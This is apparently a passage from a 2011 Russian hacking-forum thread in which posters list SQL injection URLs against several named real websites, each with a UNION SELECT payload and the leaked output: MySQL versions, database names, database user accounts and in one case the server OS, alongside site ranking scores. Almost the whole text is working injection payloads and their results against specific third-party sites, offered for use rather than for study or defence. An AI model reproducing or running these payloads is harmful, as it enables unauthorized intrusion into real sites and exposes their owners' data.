database: allesistgu_nexia
user: allesistgu_nexia@localhost
тИЦ: 10 | pr: 1
http://studyincors.ru/country.php?id=-1+union+Select+1,concat_ws%280x3a3a,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
version: 5.0.77-log
database: azanova_edu
user: azanova_edu@bitrix54.timeweb.ru
тИЦ: 0 | pr: 0
http://www.earthburg.ru/earthadm/php/process.php?lang=r&c1=10&id=-1+union+select+concat_ws%280x3a3a,version%28%29,database%28%29,user%28%29%29,2,3+--+
version: 5.0.92-log
database: earthbu6_earthburgnew
user: earthbu6_me@localhost
тИЦ: 50 | pr: 3
http://eti.stankin.ru/index.php?table=grcms_post_menu&id=-1+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29+--+
version: 5.1.28-rc
database: eti
user: eti@localhost
тИЦ: 10 | pr: 2
http://tatspirtprom.ru/production/catalog/balzami/balzami_30.html?template=-18%20and%201=2%20union%20select%201,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),6,7--
[COLOR=Sienna]5.0.83 u01586_tsp_ru@localhost u01586_tsp_ru portbld-freebsd6.4[/COLOR]
SergioRezza
20.06.2011, 12:35
http://www.cmbc.ru/process.php?ID=1%27%20AND%201%3D2+UNION+SELECT+version(),2,3+%23
тИЦ 110
PR 3
Перевод vBulletin 3.0.3 и vB Advanced CMPS 1.0 выполнен командой WarezOK.com, на основе перевода Lomonovsky Home Network Forum